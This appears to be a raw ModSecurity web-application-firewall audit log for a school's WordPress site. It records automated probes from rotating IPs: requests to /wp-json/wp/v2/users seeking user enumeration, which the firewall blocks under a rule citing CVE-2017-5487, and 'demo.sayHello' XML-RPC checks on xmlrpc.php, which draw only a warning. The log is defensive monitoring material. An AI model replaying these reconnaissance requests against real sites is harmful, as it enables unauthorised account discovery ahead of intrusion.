sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63829614-Z-- --7a72ab24-A-- [05/May/2025:23:10:46 +0700] aBjjBoZWvR7-42f6JrANeAAAAMo 103.236.140.4 48104 103.236.140.4 8181 --7a72ab24-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.232 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7a72ab24-C-- demo.sayHello --7a72ab24-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a72ab24-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461446775011 5574 (- - -) Stopwatch2: 1746461446775011 5574; combined=4377, p1=570, p2=3560, p3=32, p4=35, p5=104, sr=146, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a72ab24-Z-- --5a151714-A-- [05/May/2025:23:10:52 +0700] aBjjDIZWvR7-42f6JrANfwAAAMI 103.236.140.4 48152 103.236.140.4 8181 --5a151714-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5a151714-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a151714-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461452806354 3131 (- - -) Stopwatch2: 1746461452806354 3131; combined=1401, p1=464, p2=905, p3=0, p4=0, p5=31, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a151714-Z-- --7418512b-A-- [05/May/2025:23:10:56 +0700] aBjjEIZWvR7-42f6JrANhQAAAMU 103.236.140.4 48184 103.236.140.4 8181 --7418512b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.215 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7418512b-C-- demo.sayHello --7418512b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7418512b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461456155699 5295 (- - -) Stopwatch2: 1746461456155699 5295; combined=4044, p1=606, p2=3237, p3=34, p4=37, p5=77, sr=76, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7418512b-Z-- --68d5bb48-A-- [05/May/2025:23:11:04 +0700] aBjjGARwKNFSM6B7_LagyQAAAJU 103.236.140.4 48258 103.236.140.4 8181 --68d5bb48-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.255 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --68d5bb48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68d5bb48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461464327147 2176 (- - -) Stopwatch2: 1746461464327147 2176; combined=1223, p1=413, p2=779, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68d5bb48-Z-- --a5cb977c-A-- [05/May/2025:23:11:07 +0700] aBjjGwRwKNFSM6B7_LagywAAAJc 103.236.140.4 48290 103.236.140.4 8181 --a5cb977c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.255 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a5cb977c-C-- demo.sayHello --a5cb977c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5cb977c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461467119735 5331 (- - -) Stopwatch2: 1746461467119735 5331; combined=4154, p1=516, p2=3425, p3=35, p4=38, p5=83, sr=62, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5cb977c-Z-- --fa452d51-A-- [05/May/2025:23:11:29 +0700] aBjjMU2V_h1VFAgsfgZ9kgAAABM 103.236.140.4 48504 103.236.140.4 8181 --fa452d51-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fa452d51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa452d51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461489915898 3298 (- - -) Stopwatch2: 1746461489915898 3298; combined=1481, p1=513, p2=924, p3=0, p4=0, p5=43, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa452d51-Z-- --abdc876b-A-- [05/May/2025:23:11:32 +0700] aBjjNPZJDMuQndL03JNdSgAAAEk 103.236.140.4 48528 103.236.140.4 8181 --abdc876b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.112 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --abdc876b-C-- demo.sayHello --abdc876b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --abdc876b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461492660974 5268 (- - -) Stopwatch2: 1746461492660974 5268; combined=4265, p1=537, p2=3507, p3=32, p4=35, p5=92, sr=89, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abdc876b-Z-- --e829511f-A-- [05/May/2025:23:11:34 +0700] aBjjNk2V_h1VFAgsfgZ9lgAAABQ 103.236.140.4 48548 103.236.140.4 8181 --e829511f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e829511f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e829511f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461494285978 2772 (- - -) Stopwatch2: 1746461494285978 2772; combined=1290, p1=433, p2=827, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e829511f-Z-- --75840407-A-- [05/May/2025:23:11:38 +0700] aBjjOoZWvR7-42f6JrANtAAAANU 103.236.140.4 48584 103.236.140.4 8181 --75840407-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.201 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --75840407-C-- demo.sayHello --75840407-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --75840407-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461498150604 6079 (- - -) Stopwatch2: 1746461498150604 6079; combined=4729, p1=608, p2=3873, p3=43, p4=45, p5=96, sr=76, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75840407-Z-- --0902850a-A-- [05/May/2025:23:11:55 +0700] aBjjS02V_h1VFAgsfgZ9oAAAAA0 103.236.140.4 48724 103.236.140.4 8181 --0902850a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0902850a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0902850a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461515658859 3518 (- - -) Stopwatch2: 1746461515658859 3518; combined=1547, p1=527, p2=989, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0902850a-Z-- --e0619064-A-- [05/May/2025:23:11:58 +0700] aBjjTvZJDMuQndL03JNdYAAAAEc 103.236.140.4 48764 103.236.140.4 8181 --e0619064-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.175 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e0619064-C-- demo.sayHello --e0619064-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0619064-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461518798163 5313 (- - -) Stopwatch2: 1746461518798163 5313; combined=4215, p1=535, p2=3458, p3=32, p4=35, p5=92, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0619064-Z-- --6304dd03-A-- [05/May/2025:23:12:30 +0700] aBjjbvZJDMuQndL03JNdcQAAAFM 103.236.140.4 49028 103.236.140.4 8181 --6304dd03-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.52 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6304dd03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6304dd03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461550508450 3221 (- - -) Stopwatch2: 1746461550508450 3221; combined=1427, p1=484, p2=910, p3=0, p4=0, p5=32, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6304dd03-Z-- --df77cd08-A-- [05/May/2025:23:12:33 +0700] aBjjcQRwKNFSM6B7_Lag8AAAAJg 103.236.140.4 49056 103.236.140.4 8181 --df77cd08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.52 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --df77cd08-C-- demo.sayHello --df77cd08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --df77cd08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461553511806 5345 (- - -) Stopwatch2: 1746461553511806 5345; combined=3745, p1=497, p2=3056, p3=37, p4=36, p5=71, sr=57, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df77cd08-Z-- --b0f93104-A-- [05/May/2025:23:13:53 +0700] aBjjwQRwKNFSM6B7_LahMQAAAJQ 103.236.140.4 49806 103.236.140.4 8181 --b0f93104-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b0f93104-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0f93104-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461633084147 3598 (- - -) Stopwatch2: 1746461633084147 3598; combined=1496, p1=537, p2=928, p3=0, p4=0, p5=31, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0f93104-Z-- --4ade0c72-A-- [05/May/2025:23:13:56 +0700] aBjjxE2V_h1VFAgsfgZ93AAAABI 103.236.140.4 49838 103.236.140.4 8181 --4ade0c72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4ade0c72-C-- demo.sayHello --4ade0c72-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ade0c72-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461636505579 6379 (- - -) Stopwatch2: 1746461636505579 6379; combined=4689, p1=601, p2=3791, p3=41, p4=44, p5=128, sr=79, sw=84, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ade0c72-Z-- --c786e62a-A-- [05/May/2025:23:13:58 +0700] aBjjxvZJDMuQndL03JNdrgAAAFg 103.236.140.4 49858 103.236.140.4 8181 --c786e62a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c786e62a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c786e62a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461638044824 2093 (- - -) Stopwatch2: 1746461638044824 2093; combined=1010, p1=356, p2=625, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c786e62a-Z-- --6a56124f-A-- [05/May/2025:23:14:01 +0700] aBjjyYZWvR7-42f6JrAN9wAAAMs 103.236.140.4 49890 103.236.140.4 8181 --6a56124f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6a56124f-C-- demo.sayHello --6a56124f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a56124f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s 